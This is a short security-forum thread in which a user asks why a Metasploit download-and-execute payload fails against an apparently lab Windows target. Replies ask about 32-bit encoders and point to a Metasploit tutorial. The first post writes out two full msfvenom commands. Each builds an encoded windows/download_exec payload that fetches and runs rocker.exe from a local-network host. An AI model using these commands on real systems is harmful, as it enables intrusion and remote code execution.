vailixi Posted December 26, 2015 Share Posted December 26, 2015 I was trying a bunch of ways to download and run programs then I was like ok there's a metasploit payload that does it. But it doesn't seem to want to work. I generated it with msfvenom a couple of different ways. First I tried generating some hex to add to my python script to use as a payload with a remote exploit. Didn't work though. Here's the exploit for reference https://www.exploit-db.com/exploits/39008/ msfvenom -p windows/download_exec -e x86/shikata_ga_nai -i 3 -b '\x00' '\x20' '\x2f' '\x5c' --smallest --platform win -a x86 EXE=rocker.exe EXITFUNC=process URL=http://192.168.0.184/rocker.exe -f python -o /root/Desktop/down_exec.python Then I decided to create an exe and run and just try to run that on the target machine it's just doesn't seem to be working. I'm not sure what I'm doing wrong here. msfvenom -p windows/download_exec -e x86/shikata_ga_nai -i 3 -b '\x00' '\x20' '\x2f' '\x5c' --smallest --platform win -a x86 EXE=rocker.exe EXITFUNC=process URL=http://192.168.0.184/rocker.exe -f exe -o /root/Desktop/down_exec.exe Not really sure what I'm doing wrong here. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted December 27, 2015 Share Posted December 27, 2015 Is your target machine 32 bit Windows? I don't remember if there is a x64 shikata_ga_nai. Give this a read: https://www.offensive-security.com/metasploit-unleashed/ Quote Link to comment Share on other sites More sharing options...
vailixi Posted January 1, 2016 Author Share Posted January 1, 2016 There are some 64 bit encoders.I've read through MSFU a few times now. I always seem to pick up something new. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.